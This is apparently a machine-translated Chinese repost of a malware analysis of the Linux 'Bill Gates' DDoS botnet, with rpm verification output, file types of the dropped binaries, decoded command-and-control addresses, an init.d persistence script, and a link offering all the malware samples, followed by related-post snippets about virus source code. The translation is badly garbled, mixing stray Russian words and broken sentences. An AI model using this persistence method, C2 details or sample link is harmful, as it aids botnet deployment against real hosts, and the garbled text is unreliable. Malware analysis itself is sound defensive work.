.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-access.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado5.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado_access.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ado_mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-borland_ibase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-csv.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-db2.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-fbsql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-firebird.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ibase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-informix.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-informix72.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-ldap.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mssqlpo.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mysql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mysqli.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-mysqlt.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-netezza.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oci8.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oci805.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oci8po.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbc.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbc_mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbc_oracle.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbtp.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-odbtp_unicode.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-oracle.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-pdo.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-postgres.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-postgres64.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-postgres7.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-proxy.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sapdb.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sqlanywhere.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sqlite.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sqlitepo.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-sybase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers/adodb-vfp.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ar.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-bg.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-bgutf8.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ca.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-cn.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-cz.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-de.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-en.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-es.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-fr.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-hu.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-it.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-nl.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-pl.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-pt-br.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ro.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-ru1251.inc.php
.M.......    /usr/share/cacti/lib/adodb/lang/adodb-sv.inc.php
.M.......    /usr/share/cacti/lib/adodb/license.txt
.M.......    /usr/share/cacti/lib/adodb/toexport.inc.php
.M.......    /usr/share/cacti/lib/adodb/tohtml.inc.php
.M.......    /usr/share/cacti/lib/api_automation_tools.php
.M.......    /usr/share/cacti/lib/api_data_source.php
.M.......    /usr/share/cacti/lib/api_device.php
.M.......    /usr/share/cacti/lib/api_graph.php
.M.......    /usr/share/cacti/lib/api_poller.php
.M.......    /usr/share/cacti/lib/api_tree.php
.M.......    /usr/share/cacti/lib/auth.php
.M.......    /usr/share/cacti/lib/cdef.php
.M.......    /usr/share/cacti/lib/data_query.php
.M.......    /usr/share/cacti/lib/database.php
.M.......    /usr/share/cacti/lib/export.php
.M.......    /usr/share/cacti/lib/functions.php
.M.......    /usr/share/cacti/lib/graph_export.php
.M.......    /usr/share/cacti/lib/graph_variables.php
.M.......    /usr/share/cacti/lib/html.php
.M.......    /usr/share/cacti/lib/html_form.php
.M.......    /usr/share/cacti/lib/html_form_template.php
.M.......    /usr/share/cacti/lib/html_tree.php
.M.......    /usr/share/cacti/lib/html_utility.php
.M.......    /usr/share/cacti/lib/html_validate.php
.M.......    /usr/share/cacti/lib/import.php
.M.......    /usr/share/cacti/lib/ldap.php
.M.......    /usr/share/cacti/lib/ping.php
.M.......    /usr/share/cacti/lib/plugins.php
.M.......    /usr/share/cacti/lib/poller.php
.M.......    /usr/share/cacti/lib/rrd.php
.M.......    /usr/share/cacti/lib/snmp.php
.M.......    /usr/share/cacti/lib/sort.php
.M.......    /usr/share/cacti/lib/template.php
.M.......    /usr/share/cacti/lib/time.php
.M.......    /usr/share/cacti/lib/timespan_settings.php
.M.......    /usr/share/cacti/lib/tree.php
.M.......    /usr/share/cacti/lib/utility.php
.M.......    /usr/share/cacti/lib/variables.php
.M.......    /usr/share/cacti/lib/xml.php
.M.......    /usr/share/cacti/logout.php
.M.......    /usr/share/cacti/plugins
.M.......    /usr/share/cacti/plugins.php
.M.......    /usr/share/cacti/plugins/index.php
.M.......    /usr/share/cacti/poller.php
.M.......    /usr/share/cacti/poller_commands.php
.M.......    /usr/share/cacti/poller_export.php
.M.......    /usr/share/cacti/resource
.M.......    /usr/share/cacti/resource/script_queries
.M.......    /usr/share/cacti/resource/script_queries/host_cpu.xml
.M.......    /usr/share/cacti/resource/script_queries/host_disk.xml
.M.......    /usr/share/cacti/resource/script_queries/unix_disk.xml
.M.......    /usr/share/cacti/resource/script_server
.M.......    /usr/share/cacti/resource/script_server/host_cpu.xml
.M.......    /usr/share/cacti/resource/script_server/host_disk.xml
.M.......    /usr/share/cacti/resource/snmp_queries
.M.......    /usr/share/cacti/resource/snmp_queries/host_disk.xml
.M.......    /usr/share/cacti/resource/snmp_queries/interface.xml
.M.......    /usr/share/cacti/resource/snmp_queries/kbridge.xml
.M.......    /usr/share/cacti/resource/snmp_queries/net-snmp_disk.xml
.M.......    /usr/share/cacti/resource/snmp_queries/netware_cpu.xml
.M.......    /usr/share/cacti/resource/snmp_queries/netware_disk.xml
.M.......    /usr/share/cacti/rra.php
.M.......    /usr/share/cacti/script_server.php
.M.......    /usr/share/cacti/settings.php
.M.......    /usr/share/cacti/templates_export.php
.M.......    /usr/share/cacti/templates_import.php
.M.......    /usr/share/cacti/tree.php
.M.......    /usr/share/cacti/user_admin.php
.M.......    /usr/share/cacti/utilities.php
.M.......    /var/lib/cacti
.M.......    /var/lib/cacti/cli
.M.......    /var/lib/cacti/cli/add_data_query.php
.M.......    /var/lib/cacti/cli/add_device.php
.M.......    /var/lib/cacti/cli/add_graph_template.php
.M.......    /var/lib/cacti/cli/add_graphs.php
.M.......    /var/lib/cacti/cli/add_perms.php
.M.......    /var/lib/cacti/cli/add_tree.php
.M.......    /var/lib/cacti/cli/analyze_database.php
.M.......    /var/lib/cacti/cli/convert_innodb.php
.M.......    /var/lib/cacti/cli/copy_user.php
.M.......    /var/lib/cacti/cli/data_template_associate_rra.php
.M.......    /var/lib/cacti/cli/host_update_template.php
.M.......    /var/lib/cacti/cli/import_template.php
.M.......    /var/lib/cacti/cli/poller_data_sources_reapply_names.php
.M.......    /var/lib/cacti/cli/poller_graphs_reapply_names.php
.M.......    /var/lib/cacti/cli/poller_output_empty.php
.M.......    /var/lib/cacti/cli/poller_reindex_hosts.php
.M.......    /var/lib/cacti/cli/rebuild_poller_cache.php
.M.......    /var/lib/cacti/cli/reorder_data_query.php
.M.......    /var/lib/cacti/cli/repair_database.php
.M.......    /var/lib/cacti/cli/repair_templates.php
.M.......    /var/lib/cacti/cli/structure_rra_paths.php
.M.......    /var/lib/cacti/cli/upgrade_database.php
.M.......    /var/lib/cacti/rra
.M.......    /var/lib/cacti/scripts
.M.......    /var/lib/cacti/scripts/3com_cable_modem.pl
.M.......    /var/lib/cacti/scripts/diskfree.pl
.M.......    /var/lib/cacti/scripts/diskfree.sh
.M.......    /var/lib/cacti/scripts/linux_memory.pl
.M.......    /var/lib/cacti/scripts/loadavg.pl
.M.......    /var/lib/cacti/scripts/loadavg_multi.pl
.M.......    /var/lib/cacti/scripts/ping.pl
.M.......    /var/lib/cacti/scripts/query_host_cpu.php
.M.......    /var/lib/cacti/scripts/query_host_partitions.php
.M.......    /var/lib/cacti/scripts/query_unix_partitions.pl
.M.......    /var/lib/cacti/scripts/sql.php
.M.......    /var/lib/cacti/scripts/ss_fping.php
.M.......    /var/lib/cacti/scripts/ss_host_cpu.php
.M.......    /var/lib/cacti/scripts/ss_host_disk.php
.M.......    /var/lib/cacti/scripts/ss_sql.php
.M.......    /var/lib/cacti/scripts/unix_processes.pl
.M.......    /var/lib/cacti/scripts/unix_tcp_connections.pl
.M.......    /var/lib/cacti/scripts/unix_users.pl
.M.......    /var/lib/cacti/scripts/weatherbug.pl
.M.......    /var/lib/cacti/scripts/webhits.pl
S.5....T.    /var/log/cacti/cacti.log
S.5....T.  c /etc/ntop.conf
.......T.  c /etc/avahi/hosts
S.5....T.  c /etc/netatalk/AppleVolumes.default
S.5....T.  c /etc/netatalk/afpd.conf
S.5....T.  c /etc/netatalk/netatalk.conf
S.5....T.  c /etc/httpd/conf.d/nagios.conf
S.5....T.  c /etc/nagios/nagios.cfg
S.5....T.  c /etc/nagios/objects/commands.cfg
S.5....T.  c /etc/nagios/objects/localhost.cfg
S.5....T.  c /etc/sysconfig/ntpd
S.5....T.  c /etc/profile
SM5..UGT.  c /etc/snmp/snmpd.conf
S.5....T.  c /etc/sysconfig/iptables-config
.......T.  c /etc/avahi/avahi-dnsconfd.action
S.5....T.  c /etc/dnsmasq.conf

这意味着,任何系统文件没有被修改。因为系统进程没有被隐藏,我猜测,在这里可以不使用任何的rootkit的一定会自信地说,系统是清白的

关于的6othete搜索信息

第一件事,我开始寻找某种关于它的信息ботнете,寻找名叫域,代表从crontab文件和线。

立刻找了一些资料

My home PC has been 0wn3d :( @ forums.debian.net

What do sapd, skysapd, sksapd, and ksapd do? @ askubuntu.com

I Got Myself Hacked @ hackervisions.org

Suspected rootkit @ archlinuxarm.org

总的来说,没有什么有趣的或新的。

研究ботнета文件

随后,我利用了程序文件,以了解更多关于这些可执行文件:

atddd:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
cupsdd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
cupsddh:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
ksapdd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
kysapdd:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
skysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
xfsdxd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

Not剥离!这样的消息!

不知为什么我喜欢和我的第一件事cupsdd文件,上传了他,而不是atddd。自己也不知道为什么,但这是完全正确的。

盖茨

所以,“Gates?cupsdd模块。603170ad361f6e098c8681ed264155eb 1714fd31cc931e2a0eb97d25a076567af45dc6d8

他做的是相同的,他怎样做的呢?这是我们用IDA Pro来回答的,例如。

这个模块想做什么?

试图初始化自己

RSA数据的解压缩,在我的情况下,是这样:

116.10.189.246:30000:1:1:h:578856:579372:579888

指定的变量如下:

g_strConnTgt=116.10.189.246
g_iGatsPort=30000
g_iGatsIsFx=1
g_iIsService=1
g_strBillTail=h
g_strCryptStart=578856
g_strDStart=579372
g_strNStart=579888

参数需要确定RSA的情况下更新模块。

***“Bill?试图安装模块

检查是否已经有了gates模块却没有运行。如果没有的话,将PID存储在文件中的锁定在 / TMP / bill.lock中

找到一条路径,存储在当前的EXE,通过阅读/ proc / % d / exe路径,分配,Bill尾部 ‘添加‘,расшифрованного他在那里打开记录文件和记录信息

并启动一个新的文件。

##守护进程的功能在这里体现到了,引起ребиндитstdout和stderr上当前的标准输入,/ dev /null

##检查是否他自己(模块,运行“Gates?)通过检查文件/ TMP / gates.lock。如果运行的话,盖茨结束。

##在“添加распакованныйBill?自动加载模块的init脚本наипростейшегоsysvinit通过建立在/ etc / init.d / c,名为“DbSecuritySpt?类:

#!/bin/bash
/path/to/bill

创建在/etc/rc [1-5]。D / 97dbsecurityspt目录下:

##启动MainProcess()函数

读关于系统的基本信息,CPU,内存,网络地图

比尔

“Bill?- DDoS模块的模块。在我的情况下,被称为“cupsddh”

@@@对善于攻击主机的TCP,UDP,ICMP和DNSамплификации方法。CPU会限制自己的资源

@@@读关于系统的基本信息,CPU,内存,网络地图上,винчестерах。

@@@关于DNS读取信息。

@@@?加载模块/usr/lib xpacket.ko

@@@写下自己的/ usr / lib / libamplify.so

我开始寻找他如何可以接收从主模块传来的命令以进行攻击

“стучащий?模块

ksapdd -将文件的统计信息发送给主服务器。

他是个缝在服务器和端口的程序。在我的情况下,这是121.12.110.96:10991解码的下的结果:

Kysapdd skysapdd, file, and atddd ksapdd xfsdxd is a copy,but the first connects to 112.90.252.76:10991 10991 112.90.22.197,the two ,third ,four connects to 116.10.189.246:10991, and the 202.103.178.76:10991

结论

嗯,经历了这一切,我们更应加强一些表面的重点管理的服务器,照顾好自己的服务器

rghost.ru/52680741这里有所有的文件。

僵尸网络,Linux,逆向工程

这就是全部内容了,最后送上一句话:

Do you still remember the reason why you are here?

基于Linux平台下的僵尸网络病毒《比尔盖茨》,布布扣,bubuko.com

时间: 2024-10-25 07:46:32

基于Linux平台下的僵尸网络病毒《比尔盖茨》的相关文章

基于Linux平台下网络病毒Caem.c源码及解析

Came.c型病毒在这里主要修改了用户的密码,同时对用户的终端设备进行了监视.希望与大家共同交流 转载请注明出处:http://blog.csdn.net/u010484477     O(∩_∩)O谢谢 #define HOME "/" #define TIOCSCTTY 0x540E #define TIOCGWINSZ 0x5413 #define TIOCSWINSZ 0x5414 #define ECHAR 0x1d #define PORT 39617 #define BU

基于Linux平台病毒Wirenet.c解析

在分析Wirenet.c时,感觉自己学到了很多很赞的思想,希望跟大家一同交流. 转载请注明出处:http://blog.csdn.net/u010484477谢谢^_^ 这次并不想通篇的进行分析了,我想写出两块病毒的恶意代码,觉得思想挺好的. 一.删除某目录下的所有文件 pathpoint = opendir(path);  //打开一个目录 dirent = readdir(pathpoint);//读取目录,返回dirent结构体指针 fdname = dirent->d_name;//得到

基于Linux平台病毒BlackHole病毒解析

今天遇到了一个病毒,代码量不多,但是利用了一个函数的小空子,杀伤力确实挺惊人的. 转载请注明出处:http://blog.csdn.net/u010484477谢谢^_^ 这个病毒前面就是常规的: socket->bind->listen这个过程大家都 下面我想详细说一下它的攻击方式: while ( 1 ) { nsock = accept(sock, (struct sockaddr *)&v10, (socklen_t *)&v9);// wait to link if

(0.2.3)Linux平台下二进制方式安装mysql

本章节:二进制安装mysql 目录: 1.基于Linux平台的Mysql项目场景介绍 2.mysql数据库运行环境准备-最优配置 3.如何下载mysql数据库 4.linux平台下二进制文件方式安装mysql 4.1.环境检查(libaio包) 4.2.安装过程 (1)下载文件.上传安装程序 (2)创建用户,组,创建目录 (3)解压安装程序包 (4)修改权限(授权用户对解压目录的权限) (5)配置环境变量(以便可以直接运行mysql命令) (6)准备参数配置文件 (7)开始初始化Mysql (8

Linux平台下源码安装mysql多实例数据库

Linux平台下源码安装mysql多实例数据库[[email protected] ~]# netstat -tlunp | grep 330tcp6 0 0 :::3306 :::* LISTEN 6191/mysqld [[email protected] ~]# ss -tlunp | grep 330tcp LISTEN 0 80 :::3306 :::* users:(("mysqld",pid=6191,fd=10)) [[email protected] ~]# syst

在 Linux 平台下使用 JNI

引言 Java 的出现给大家开发带来的极大的方便.但是,如果我们有大量原有的经过广泛测试的非 Java 代码,将它们全部用 Java 来重写,恐怕会带来巨大的工作量和长期的测试:如果我们的应用中需要访问到特定的设备,甚至是仅符合公司内部信息交互规范的设备,或某个特定的操作系统才有的特性,Java 就显得有些力不从心了.面对这些问题,Sun 公司在 JDK1.0 中就定义了 JNI 规范,它规定了 Java 应用程序对本地方法的调用规则. 实现步骤及相关函数使用 本文将一步步说明在 Linux 平

Windows 和 Linux 平台下的端口转发工具

原文地址: http://unmi.cc/windows-linux-port-forwarding/ 这里记录一下我曾经使用过的几个端口转发工具,即端口映射.端口重定向,和 NAT 也是差不多的概念. Linux 下用过 iptables,rinetd:Windows 下用过某个防火墙的 NAT 功能.RemoteAnywhere 的端口重定向.FPipe,还有最近刚找到的 PassPort.试着去设置一下 Windows 2000 的 NAT  功能,但未成功,还是特定的软件简单易用,下面介

Linux平台下裸设备的绑定:

Description Given a n × n matrix A and a positive integer k, find the sum S = A + A2 + A3 + - + Ak. Input The input contains exactly one test case. The first line of input contains three positive integers n (n ≤ 30), k (k ≤ 109) and m (m < 104). Then

linux平台下防火墙iptables原理(转)

原文地址:http://www.cnblogs.com/ggjucheng/archive/2012/08/19/2646466.html iptables简介 netfilter/iptables(简称为iptables)组成Linux平台下的包过滤防火墙,与大多数的Linux软件一样,这个包过滤防火墙是免费的,它可以代替昂贵的商业防火墙解决方案,完成封包过滤.封包重定向和网络地址转换(NAT)等功能. iptables基础 规则(rules)其实就是网络管理员预定义的条件,规则一般的定义为“